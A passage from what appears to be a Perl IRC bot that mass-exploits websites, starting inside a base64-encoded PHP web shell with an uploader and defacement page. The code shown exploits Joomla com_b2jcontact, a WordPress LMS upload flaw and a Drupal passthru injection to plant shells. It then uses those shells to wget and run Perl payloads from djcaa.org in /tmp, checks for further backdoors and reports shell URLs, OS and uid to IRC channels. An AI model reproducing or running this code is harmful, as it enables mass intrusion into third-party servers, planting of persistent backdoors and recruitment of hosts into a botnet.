ZCgpLiRjdXJfdXNlci4iPC9iPjxicj4iOwplY2hvICI8Zm9udCBzaXplPTIgY29sb3I9IzY0RDMwMD48Yj5VbmFtZSA6ICIucGhwX3VuYW1lKCkuIjwvYj48YnI+IjsKfQpmdW5jdGlvbiBwd2QoKSB7CiRjd2QgPSBnZXRjd2QoKTsKaWYoJHU9c3RycnBvcygkY3dkLCcvJykpewppZigkdSE9c3RybGVuKCRjd2QpLTEpewpyZXR1cm4gJGN3ZC4nLyc7fQplbHNle3JldHVybiAkY3dkO307Cn0KZWxzZWlmKCR1PXN0cnJwb3MoJGN3ZCwnXFwnKSl7CmlmKCR1IT1zdHJsZW4oJGN3ZCktMSl7CnJldHVybiAkY3dkLidcXCc7fQplbHNle3JldHVybiAkY3dkO307Cn07Cn0KJGZpbGVzID0gQCRfRklMRVNbImZpbGVzIl07CmlmICgkZmlsZXNbIm5hbWUiXSAhPSAnJykgewogICAgJGZ1bGxwYXRoID0gJF9SRVFVRVNUWyJwYXRoIl0gLiAkZmlsZXNbIm5hbWUiXTsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGVzWyd0bXBfbmFtZSddLCAkZnVsbHBhdGgpKSB7CiAgICAgICAgZWNobyAiPGgxPjxhIGhyZWY9JyRmdWxscGF0aCc+T0stQ2xpY2sgaGVyZSE8L2E+PC9oMT4iOwogICAgfQp9CmlmKGlzc2V0KCRfR0VUWydjb2xlayddKSl7CmVjaG8gJzxodG1sPjxoZWFkPjx0aXRsZT5VcGxvYWQgZmlsZXM8L3RpdGxlPjwvaGVhZD48Ym9keT48Zm9ybSBtZXRob2Q9UE9TVCBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBhY3Rpb249IiI+PGlucHV0IHR5cGU9dGV4dCBuYW1lPXBhdGg+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGVzIj48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9IlVwIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwp9CiRmaWxlMSA9ICdQRDl3YUhBS1pYWmhiQ2huZW1sdVpteGhkR1VvWW1GelpUWTBYMlJsWTI5a1pTaHpkSEpmY205ME1UTW9jM1J5Y21WMktDYzljSFF2Wm1JM1RIbEdhV2gwU2tOWk5YWm1NME5HVkhKNWRWQlRZMmRsYVhka2FsZE5UaTlHWXpoQlZHbFJkbnB3Wm1oak1XVlBPR1UzWTI1cVNHUktTM2t4Y1hCYWMxaEplbE5HWW5Gd2NWVlNlWGRzWld4VmVISlJjbk5LVW5SeVdURkJXazlKVlZoa1VHWnpWbGhaVXpOM2RHY3hVRzlEU0NzeGRqUlhOM0F6TkdacGR6QlVjMVp1VURKTVRWSlliMHN4ZHpRd1pVbFBWMEUxY21KV1dXVXJkVlZJZEd0cUwwbDFZbWhMWVRKc2VEQkNUWFpNZGtkVFFVVnBUV3cwVmtGQlUyNVZTbVkwY3pkM1UzazRlSFZWTUhWWmIycFlNVmxHU3pNd2JsZFBkWFZzV1ZKS056UkpRM2RqWmt0MmEyd3JlVVZHTHl0UE5XeFVVM3BMVTNSTU0yVXZPWGRJWjBsS05WaEdSbUZ6T0ZrNVFXZHljSEF6VFhSWVptbzBTRXB1UzNoUVkzWkdkbFU0Vm1GYVpGVkRXSFJ5UzJsaFIwNDFaMjAzV21zNWVsSlhNMVJxWVVkSWIzSTVXRkJzUzFGaVpGZFBXV2R4TXpORWJVNWFhV1JvVjIxTFkyUkVaME4xYTJOTWFTdDBPR1ZwZVdFMWNURlRWRFprZG1WUFMzRnhlVGhzZVU1Q2NIRlBkV3BvYjJSQ1JYazNiREY1WjNNMFlUWjJRa1EzWjA0eE1HUmxiWEI1TldWaFYwTm9VV1U0WWxGdE0yaGhXSFUyWkRCb1luRTNNMDFYV1hrdk4yMVBaVkZMT0VjMVVVSk1SWEJ5VldNeGRqVmFjV296Ukc1ME1uWTJObmxYWlRkbVoyeDRjR05uY21SVk9WWnJjbWxtZEROV05qaEpUbll6WjNJd2FtTTNZbFJKVFhGSloxaG5kWE5GU1dweFRYQktNRkJ0UzNwRWRIUm1jRTV0TkdSVmRGVTNlVlpzVlZsRVRIUnZNQzlMZFdwYVVsVTFVeTh4YlVSMlUwMXBhazl5YUcxcWEzbEdUM0V6YmpsSUwycHZhWGxLUlhaM1UxZ3ljMWxGV0ZSNGEzcExTMnhOU1VWeVlVeGlUR3RsVGtwTGFuTlZRbUpyYjFCQlRqaGtUa2hOTlc5MWNHZGhiakZVYlcxUVdraFVabkZyWm5reVNXcDFNekIzZFdoT1EyWnFTRVIyTlRBdlkwRXhUamd3YVRGb1IxbzRSbTh4VkhoMk9GcHdiMjlZVDNWQ2J6TkpLMmxNVFU1bGVTOVhVVFJJY0haV01tNTJLMUpYYldWUU0zbGtiVE0xZUNzeWNHNUNkVzQxTTJORVdtNXNhbnBLWWtNNFExbEVPRk5SVFhWaFMwZFplREJyYjFsWlVFZFBkemRzYmpjd2ExRm9URW8zYVZkdk0wRnRkRGhCWTNkemJIVTVXak5SY1c1TFVHUkdRMUJsTUVKSmIySk1VbXBJVm5OeWFGcGpSR2xMVFU1VmNuRjRjbkZqVEdzM2FIQXZXbEprT1RWcFdWUjJOMDVRVGpNM2JVTTNUVlUzVmpJck0wdFhWWEZ6V214clkxYzBTMlp0T1hodFFVUnRSR1kwVlRsYVN5czFZM2h5YUdsSVR6Sk5SVUU0VjB0TmNFbHhOVGxXTlc5aWRtTXZTMk55SzJ0TFFuaDVPVGhwWVhNNVZqTnRaRWRLWm5aeU0yMDNlazUyT0ZWS05DOWpLemcxYVV0bWJXRmxLemhvVWtNMGNFTTBNUzgxUVN0UlNUSk5aM2N3SzA5dE5qaDVNVkJJYzNBMWMzTkRORWhMTlcxdE5GWjVkelV4V214dldscG5kbTV5WVVoa05uUTVTRTlQZURWWlRrOXRZM2t2U1VkTFYwVk5URnBGTm5Gb1dGQlZiVU5zUzJSR01VWlFNa2RrY25sVVRYWlliazl1YkhOWlpYQXhZM3BFTkdoTmVYTk1hWEEyU2pWRFlYSXJlVE5OTUZNMFoxVkthaTg1YURoMmFVbzNZV0V3YkZnclMwZDJNa1poV20xaFlXVkZNemh0WldNeWNqTXJObGhNUVdVMFpuWXpjRVpvTDA4cmFYZ3hSa3RTY0ZSbE9EVjBheTl3VkZWa1QyNHlOV2NyTDFsWE1VUklXVlpuVkcweFRGaHdlWEJ3UW5aVVoyNTRTbVkyVVZKcmJVMW5VWFpXVEdkcFJVRjBhRTFJU1d4aGJFdFViMjlvTVZkblUyaEZNM2hZZVVSaWRVWlJWM3BHVkcxVmJVUjNRVFpzUkhkRlEzUktjVTloYmpGc1pGTkVZVEZzWVRsSmFsWXdWWGsyVTFwTVVuaDBiWE14VHpCTU9XMTRlVU15Y2xwalQwZFZjWGsyZUZWQ2FYYzBhakU0YlZBeGJuaEVNazFRU0ZNdmVEaEtWRFZsTUVaa1RVWTJNVUpWZEdweGRWSlplakZaSzBWeWVXRkRWV3R3WTIwM2FuUkljblEyVDFkaGRXeEViblZHTVZCWU5IcG5USEJPUms1RWRGazRWMnRLYzJwSFVUUnRkMUYzVDNBNE1rczBiV2hXWkhBelExcHhOMkZPYjNkeE5Tc3ZkMWROTkRKc1MyMUZSbkp6Um01RlRXMUlWRlpJYkdWbE1sRnJha2xOVFRBNWNWaDRjbGQzUkc1a1psWm1iMkprYm0xU1ZGWlVhV2RUYkZka2VrbFZiVUpJZUdrMlEwTkRlVVprY0NzNVZYTTVabEZCWVV0VU5rTkdibUkxYVhCdlRTdE9RVlI0TUhoTVlWTjRkR1JyZGxGSVNDOWxVRWx6V0ZSU1lteFhhV05XV1RSSGFsQnZSMEZZVTA1UFFXRk5NM2x0T0cxck9FcHdOSFpVWTNwdlV5dHFlVzFtZEVwQ2JteDJja2hXYW1wVmVWcGtPVzV1UWtkWFVVeExZVWh3WVVWMU5rRXZZa2x4TmtsVVZYcFdTbkZpWTBwaFZqWkxkRmw0ZFVSNmVUSkVRbTlCWVVodE1rbDZObEIzZEZCWlprODJhR1UxTDBwV1kxaG5WRmhNWTFORVNYSllOVzVXTTNSMGRHcG5UazVKYXl0U1lUUkZaekJvZFdObk1GSlRjRmxqTVZwSE1rcGxVVkJRTDFSYVMxWkZUa2N2TUd0QlpURklXVVo1VDFwdVRrcDZhMEpUZFV4MGVHWkhTRXh3YVVSdFowUm9jRUZNVGl0d1F5OTFTV1pMWlVJNE9IUldXbFZSWjFSSFZWUkVZM0JQUzIxTVRua3hVMFp4V1ZKblowdFNlbUZ6UjI5RGFVNWhUR1Z2YkVkSU9YcFBiblprTDB4T2RHeGxNREJGVDBSTlZESkVRV2x2TkRoT05ISm1TME5KZVdrMWNUZFpWSFZsWkdKQmMxVjFZMXBvVDJkemQwazJjRkJ3TW1WMWEyOWtORE52VURBNGRsQmplRlo1VW1oamIyWlBabTlTZWsxb2FHbEViRkZYUjBvd2FHZFFNVkJGUkc1d1pVbHlWR05rV1hkTmVrRndPVkphTlhabVdYaG1VMkl3YkhKU1ptbEZOV1ZyWjJWUlUyVjFVRm8yVURFd1NsRlJVVmtyYm5CTmEwaEJlVGRWYTFkckwxUXpWVUUzZDJ0RGFEZGpSRU5UZVVSVGFubzNXWFV3V21kR1RrNUlLMFpJVW1zMFQwaENjbU5NTlRNM2JFWlZWMjlvUkdORVExcExNbXhTZFRkMFdIUnNka2xFYmk5NmJWcDJkbUp3VjBwWFpqRjFkbU5QU0daT2RTdEVSRFJuVWtOQlVITTBlVXBpYVZWTlFrVmFXbG8yUjJKT1QzbHJVM1lyU0c1b1dXZHRUVW95VUVveFJFMVhabmhCU0hacFFWQlhNMEpLZGxOYVpEUkJWbHBHU1RkdWFYQTJPVXRaYUdsM0x6RklTV050UmxCWFJHOU1SblI0UlVsamVVWkdXWEUyVUc1S1RITTBWSGR5ZDJodVpqSjZaV1ZvZVVkMVlsSjBTVTVSTkhrNFdXMU9ZekpPVW1KeU5ERnRWMVJaTVRVeFlXWnBSM05TTVRoU2VrZHliVmRZT0ZKcFVFNVFVR3cxUTFSMVkyRjBlVkZNVkdKRmVIaGlkRlZHWlZsM2QyTnBXRWxWTDFaVWMzTldaMlp2VFU5dE1sWlFRMG92VEROMlZUUjFURzVQYm10T2JWaFFaV0V6UTNGMllrTmljelprUmtWMVJrRkphVkp6SzJFclYyd3djMnBsZFRBMVpWUkVSek5JYjBZMFFrczJjblYzVkd4alFXbEdOVGRUYlRkM1ZrTXhTa1Z4ZGtGUVREUjZhMFl3YXpSMFJGVnFjVWRuTXpCeU5WQjNiVWh1VDBSeVoyUm1kaloxUW5wWE5ubFBTa3dyTUc5bVppOTJWM0J1TkUxR1MwTkJLMk15WVhwdllUbHZXbTVSYTBWMVJHUjZXWFZpYVhRM2IwOWpRVTExTlZKVk1WQlZLek5aU2tWc1VuQmpWbGhKTTFoR1pHUnJLemhhZEZnMGExaE9VM05FU0VaR1pEZzJaRlpJYWxSS05VRTRTVXRvZUZOcllrcHJiakJRU1RoSE1XOXlRVXg2Y25odk1XMWpNM0ZtYUN0UVlXZDBWV1pOUlZoSVluSm9LM2h2TWpkck56aDNaa054Y1dwUlFuUkNLelZaV0ZCR05GWk5SSFJ5WkVOVVNHaGliME5rUW5OMGQxTkdRVUZDUzFsR2FYTk5OVmRMV1djNFZVaGlWRU40ZEZVeU9HSnRSWHB1WkhCUVJUTlFNVm94Y1ZOdVRqSXZkelpFZW5KQ2FDOU1WbFZvT1dsM01VWjZOMDg1YlUxMmRXOXFkbFpMYmtkelZIQXZSa2hyZFVGbWNXdHVaV3A0UWtGTllsTnlTV0pZZUZSMVZUUm5hVEExT0RGU2JYWXpSbGMwYmtKRFltdDZOak5pTmpWUFkwMVpiVWQ2V2tRdksyMU5hSGdyVDFvM1prY3ljSE5GTVVsdlkzVXpPQ3RNVjBkTVFWWnRXRWhXWkd4SFQzSkJRVkJyWmpsYWNtVlhUVlE0YjJZM1V6aDBWRXAzYkRoTU5qZE5TMHRMZWpOcmIwSTFOMmNyVDAwNWNXUkNjMVZoYzNZemVGSlpWVmRvYkhCellsa3JNRk12WlZodU1sa3lTRVEyZEVac1NXUmhUMjB6Y1RoTVVuTjRRV1J4YzFodFJrOTJaVk14V1ZkdVExcFVhWEpvUW5kUGMxSlZNRk4xUkc5U1JreERUM05zZVdWUmNrZDZjRnAzWTJkdFF6WTJTRmxwTDNOd1NWQXpWV05xTlRsMlFVdHBWR3RNUzJWUE16VjNVWFpDUldvNWVIUXJXWEIzWkdkT1JITlhkVkJRYVcxU09UWnBha3REWnk4MkswaHJNMDFLYzFKWUt6SmxNemRvUW5oUE1tMHhTMk5MVWxGcllVZHZZbHBOYUZKaFUybHFVblZQY2xwMlpuUlliSGRRTTB4dVpGSkJNMnR4Y1hkVk5Gb3hVRXhrWTJoa2FHOHpNWEZoU0ZKcE5tWk5kMUUzVmxaRk0wbE5OMHRySzFsbmMxSmFXazFrZWtseFdWUjBTRE5XUVhoeE9HWk5VVnBLWnpWV2JXdFRXVEp2UjFaaGEybFJVRkIwU2xGMldXVjJOR0ZoT0ZaalozRnZkMFZsSnlrcEtTa3BPd28vUGc9PSc7CiRwYXRoMSA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy8nLicvbWlscy5waHAnOwppZihmaWxlX2V4aXN0cygkcGF0aDEpKSBAdW5saW5rKCRwYXRoMSk7CiRjb250ZW50MSA9IGJhc2U2NF9kZWNvZGUoJGZpbGUxKTsKJHR4dDEgPSBmb3BlbigkcGF0aDEsImErIik7CmZ3cml0ZSgkdHh0MSwgJGNvbnRlbnQxKTsKZmNsb3NlKCR0eHQxKTsKPz4KPGh0bWw+CjxoZWFkPgo8dGl0bGU+QmxhY2tQYW50aGVyczwvdGl0bGU+CjwvaGVhZD4KPGJvZHkgb25Mb2FkPSJkb2N1bWVudC5mLkBfLmZvY3VzKCkiIGJnY29sb3I9IiMwMDAwMDAiIHRvcG1hcmdpbj0iMCIgbGVmdG1hcmdpbj0iMCIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCI+Cjx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDAlIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjIiPgo8dHI+Cjx0ZCBiZ2NvbG9yPSIjQzJCRkE1IiBib3JkZXJjb2xvcj0iIzAwMDA4MCIgYWxpZ249ImNlbnRlciI+CjxiPjxmb250IGNvbG9yPSIjMDAwMDgwIiBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPgo8dGQgYmdjb2xvcj0iIzAwMDA4MCI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiIgY29sb3I9IiMwMDk5MDAiPjxiPkNHSS1UZWxuZXQgQmxhY2tQYW50aGVycyBUZWFtIENvbm5lY3RlZCB0byB0aGUgc2VydmVyPC9iPjwvZm9udD48L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjQzJCRkE1Ij48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4KPC9mb250PjwvdGQ+CjwvdHI+CjwvdGFibGU+Cjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj4KICAgIDxib2R5IGJnY29sb3I9YmxhY2s+Cgk8cHJlPjxmb250IGNvbG9yPSIjZmYwMDAwIj4gX19fX18gIF9fX19fICBfX19fXyAgICAgICAgICBfX19fXyAgICAgICAgXyAgICAgICAgICAgICAgIF8KLyAgX18gXHwgIF9fIFx8XyAgIF98ICAgICAgICB8XyAgIF98ICAgICAgfCB8ICAgICAgICAgICAgIHwgfAp8IC8gIFwvfCB8ICBcLyAgfCB8ICAgX19fX19fICAgfCB8ICAgIF9fXyB8IHwgXyBfXyAgICBfX18gfCB8Xwp8IHwgICAgfCB8IF9fICAgfCB8ICB8X19fX19ffCAgfCB8ICAgLyBfIFx8IHx8ICdfIFwgIC8gXyBcfCBfX3wKfCBcX18vXHwgfF9cIFwgX3wgfF8gICAgICAgICAgIHwgfCAgfCAgX18vfCB8fCB8IHwgfHwgIF9fL3wgfF8KIFxfX19fLyBcX19fXy8gXF9fXy8gICAgICAgICAgIFxfLyAgIFxfX198fF98fF98IHxffCBcX19ffCBcX198IDIuMAoKPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gICAgICAgICAgICAgICAgICAgICAgX19fX19fICAgICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI0FFODMwMCI+wqkgMjAxOSwgQkxBQ0stUCBUZWFtPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KICAgICAgICAgICAgICAgICAgIC4tJnF1b3Q7ICAgICAgJnF1b3Q7LS4KICAgICAgICAgICAgICAgICAgLyAgIEJsYWNrUCAgIFwKICAgICAgICAgICAgICAgICB8ICAgICAgICAgICAgICB8CiAgICAgICAgICAgICAgICAgfCwgIC4tLiAgLi0uICAsfAogICAgICAgICAgICAgICAgIHwgKShfby8gIFxvXykoIHwKICAgICAgICAgICAgICAgICB8LyAgICAgL1wgICAgIFx8CiAgICAgICAoQF8gICAgICAgKF8gICAgIF5eICAgICBfKQogIF8gICAgICkgXDwvZm9udD48Zm9udCBjb2xvcj0iIzAwOTkwMCI+X19fX19fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+XDwvZm9udD48Zm9udCBjb2xvcj0iIzAwOTkwMCI+X188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnwqRVZJTCp8PC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIj5fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+LzwvZm9udD48Zm9udCBjb2xvcj0iIzAwOTkwMCI+X19fX19fX19fX19fX19fX19fX19fX18KPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gKF8pPC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIj5AOEA4PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj57fTwvZm9udD48Zm9udCBjb2xvcj0iIzAwOTkwMCI+Jmx0O19fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58LVxNQVNURVIvLXw8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDk5MDAiPl9fX19fX19fX19fX19fX19fX19fX19fXyZndDs8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPgogICAgICAgIClfLyAgICAgICAgXCAgICAgICAgICAvCiAgICAgICAoQCAgICAgICAgICAgYC0tLS0tLS0tYAogICAgICAgICAgICAgPC9mb250Pjxmb250IGNvbG9yPSIjQUU4MzAwIj5XIEEgUiBOIEkgTiBHOiBQcml2YXRlIFNlcnZlcjwvZm9udD48L3ByZT4KPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSJhZG1pbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CmxvZ2luOiBhZG1pbjxicj4KcGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgo8L2NvZGU+CiAgICA8c2NyaXB0IGxhbmd1YWdlPSJKYXZhU2NyaXB0Ij4KICAgIHZhciB0ZXh0ID0iPGI+SSdtPGI+IDxpPmp1c3QgYSBjcmVhdHVyZSB3aG8gYWx3YXlzIHdhbnRlZCB0byBsZWFybiwgSSdtIG5vdCBhIDwvaT48Yj5IQUNLRVI8L2I+LjxpPiBJJ20gYWxzbyBub3QgYSBkZXN0cm95ZXIgISEhIDxicj48Yj5JIGp1c3Qgd2FudGVkIHRvIHNob3cgdGhlIHVnbGluZXNzIG9mIFlPVVIgb3duIHN5c3RlbSB0aGF0IHlvdSBiZSBub3QgY2FyZWxlc3MgPC9iPjwvaT4uLjwvYnI+PGI+IEkgSE9QRSBZT1UgR09UIExPVkUgPC9iPjopIjsKICAgIHZhciBkZWxheT01MDsKICAgIHZhciBjdXJyZW50Q2hhcj01OwogICAgdmFyIGRlc3RpbmF0aW9uPSJbbm9uZV0iOwogICAgZnVuY3Rpb24gdHlwZSgpCiAgICB7CiAgICAvL2lmIChkb2N1bWVudC5hbGwpCiAgICB7CiAgICB2YXIgZGVzdD1kb2N1bWVudC5nZXRFbGVtZW50QnlJZChkZXN0aW5hdGlvbik7CiAgICBpZiAoZGVzdCkvLyAmJiBkZXN0LmlubmVySFRNTCkKICAgIHsKICAgIGRlc3QuaW5uZXJIVE1MPXRleHQuc3Vic3RyKDAsIGN1cnJlbnRDaGFyKSsiPGJsaW5rPl88L2JsaW5rPiI7IGN1cnJlbnRDaGFyKys7CiAgICBpZiAoY3VycmVudENoYXI+dGV4dC5sZW5ndGgpCiAgICB7CiAgICBjdXJyZW50Q2hhcj0xOwogICAgc2V0VGltZW91dCgidHlwZSgpIiwgNTAwMCk7CiAgICB9CiAgICBlbHNlCiAgICB7CiAgICBzZXRUaW1lb3V0KCJ0eXBlKCkiLCBkZWxheSk7CiAgICB9CiAgICB9CiAgICB9CiAgICB9CiAgICBmdW5jdGlvbiBzdGFydFR5cGluZyh0ZXh0UGFyYW0sIGRlbGF5UGFyYW0sIGRlc3RpbmF0aW9uUGFyYW0pCiAgICB7CiAgICB0ZXh0PXRleHRQYXJhbTsKICAgIGRlbGF5PWRlbGF5UGFyYW07CiAgICBjdXJyZW50Q2hhcj01OwogICAgZGVzdGluYXRpb249ZGVzdGluYXRpb25QYXJhbTsgdHlwZSgpOwogICAgfQogICAgPC9zY3JpcHQ+IDxiPgogICAgPGRpdiAwcHg9IiIgMTJweD0iIiBhcmlhbD0iIiBjb2xvcjo9IiIgZmYwMDAwPSIiIGZvbnQ6PSIiIGlkPSJ0ZXh0RGVzdGluYXRpb24iIG1hcmdpbjo9IiIgc3R5bGU9ImJhY2tncm91bmQtY29sb3I6IG5vbmU7IGNvbG9yOiAjMDBmZjAwOyB0ZXh0LWFsaWduOiBjZW50ZXI7IGZvbnQtZmFtaWx5OiBhcmlhbDsgZm9udC1zaXplOiAzMHB4Ij48L2Rpdj48L2I+IDxzY3JpcHQgbGFuZ3VhZ2U9IkphdmFTY3JpcHQiPiBqYXZhc2NyaXB0OnN0YXJ0VHlwaW5nKHRleHQsIDUwLCAidGV4dERlc3RpbmF0aW9uIik7IDwvc2NyaXB0PiAKICAgIDwvaGVhZD4KICAgIDwvaHRtbD4=")); ?>'; my $exploit = $ua->post($bx, Content_Type => 'multipart/form-data', Content => $index ); sleep(2); my $check = $ua->get("http://".$site."components/com_b2jcontact/style.php")->content; if($check =~/<br>/) { my $test = "http://".$site."components/com_b2jcontact/style.php"; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cekap = &get_content($test."?cek"); if ($cekap =~ m/404 Not Found/ig) { &get_content($test."?colek=cd%20/tmp%20;wget%20http://djcaa.org/doc.txt%20;%20wget%20http://djcaa.org/docx.txt%20;%20perl%20docx.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc*"); my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]!14 Executing Payload "); &msg("$admin","15,1$engine 4<9=4>4 sHeLL 4<9=4>4 ".$test." 15[ 8SafeMode = 9$safe15 ] [ 8OS = 9$os15 ] [ 8uid = $uid15 ] "); &msg("$channel","![7$engine]! 14ShelL 15[ 14SafeMode = $safe15 ] [ 9info = 3".$re."15 ] "); if ($nick eq $admin) { } else { &msg("$nick","15$engine 4<9=4>4 sHeLL 4<9=4>4 ".$test." 15[ 8SafeMode = 9$safe15 ] [ 8OS = 9$os15 ] [ 8uid = $uid15 ] "); &msg("petology","15,1$engine 4<9=4>4 sHeLL 4<9=4>4 ".$test." 15[ 8SafeMode = 9$safe15 ] [ 8OS = 9$os15 ] [ 8uid = $uid15 ] "); } my @bdpath = ( "components/com_b2jcontact/pagat.php","pagat.php", "components/com_b2jcontact/sheren.php", "components/com_b2jcontact/jlG.php", "components/com_b2jcontact/.grv.php", "components/com_b2jcontact/.jkp.php" ); my @result = &backdoorCheck($site,@bdpath); sleep(2); if($result[0] ne "false") { sleep(2); &msg("$channel","2![9$engine2]! 9[ 14$result[2] Success 13OK! 9]"); &msg("$admin","15[4+12$engine4+15] 12$result[0] OS: $result[1] SAFEMODE:4$result[2] "); } } } exit; } } } } } sub lms_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $liat = "http://".$site."/xmlrpc.php"; my $cek = &get_content($liat); if ($cek =~ m/XML-RPC server accepts POST requests only/g) { #&msg("$chanxxx","![9$engine]! [ 3".$site." ]"); sleep(3); &sx95($site,$chan,$engine); } } } } sub sx95() { my ($site,$chan,$engine) = @_; my $re = $go[rand(scalar(@go))]; my $test = "http://".$site; my $nyoba = &get_content($test);sleep(7); if ($nyoba =~ /\/wp-content\/uploads\/(.*?)\//i) { $uploads = $1; } my $kirim = "http://".$site; my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(10); #$theme = "my-theme"; my $exploit = $ua->post($kirim, Content_Type => 'multipart/form-data',Content => [ "post" => "foobar","course_id" => "foobar","uploadfile" => "foobar",'uploadfiles[]' => ["style.php.php"] ]); my $check = $ua->get("http://".$site."wp-content/uploads/assignments/style.php.")->content; if($check =~/<br>/) { #&msg("$channel","![9X]! [ 13Executing payload ]"); sleep(2); my $test = "http://".$site."wp-content/uploads/assignments/style.php."; my $cekap = &get_content($test."?cek"); if ($cekap =~ m/404 Not Found/ig) { &get_content($test."?love=cd%20/tmp%20;wget%20http://djcaa.org/doc.txt%20;%20wget%20http://djcaa.org/docx.txt%20;%20perl%20docx.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc*"); my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]!14 Executing Payload "); &msg("$admin","15,1$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) $uid "); &msg("$channel","![7$engine]! 14ShelL 15[ 14SafeMode = $safe15 ] [ 9info = 3".$re."15 ] "); if ($nick eq $admin) { } else { &msg("$nick","15$engine4,1<9=4>9 sHeLL 4<9=4>9 ".$test."15 (SafeMode=$safe) (OS=$os) $uid "); &msg("$admin","15$engine4,1<9=4>10 sHeLL 4<9=4>10 ".$test."15 (SafeMode=$safe)"); } } else { my @bdpath = ( "wp-content/uploads/assignments/batosai.php.", "wp-content/uploads/assignments/dayi.php.", "wp-content/uploads/assignments/.pagat.php.", "wp-content/uploads/assignments/.andre.php.", "wp-content/uploads/assignments/jlG.php", "wp-content/uploads/assignments/.grv.php", "wp-content/uploads/assignments/.jkp.php" ); my @result = &backdoorCheck($site,@bdpath); if($result[0] ne "false") { sleep(2); &msg("$channel","![9X]! 9[ 14$result[2] Success 3OK! 9]"); &msg("$admin","15[4+12$engine4+15] 12$result[0] OS: $result[1] SAFEMODE:4$result[2] "); } } } } sub dru_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","2![9$engine :9 Process :3 $$ 2]! [ 6Finish 2]"); } my $lihat = "http://".$site; my $cek = &get_content($lihat); if ($cek =~ /Drupal|Core|node|drupal|sites\/all|drupal.org|Devsaran/i) { if (my $pid = fork){waitpid($pid, 0);}else{if(fork){exit;} else { my $ua = LWP::UserAgent->new; $ua->timeout(5); my $addblockurl = "http://".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=curl+-o+sites/default/files/style.php+'http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff'"; my $ajax = "_triggering_element_name"; my $response = $ua->post($addblockurl, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', '_triggering_element_name' => 'name']); my $body = $response->content; my $regex='<input type="hidden" name="form_build_id" value="(.*?)" />'; if($body =~ s/$regex//){ my $newout=$1; $formcraft2up="http://".$site."/?q=file/ajax/name/%23value/$newout"; my $responses = $ua->post($formcraft2up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $xteam = "http://".$site."sites/default/files/style.php"; my $rescheck = $ua->get("http://".$site."sites/default/files/style.php")->content; if ($rescheck =~ /<br>/) { my $oscheck = &get_content($xteam."?cek"); &msg("$channel","2![9$engine2]!10 Web is Vulnerable! "); sleep(8); if ($oscheck =~ m/404 Not Found/ig) { &get_content($xteam."?132=cd%20/tmp%20;wget%20http://djcaa.org/doc.txt%20;%20wget%20http://djcaa.org/docx.txt%20;%20perl%20docx.txt%20;%20perl%20doc.txt%20;%20rm%20-rf%20doc*"); if ($oscheck 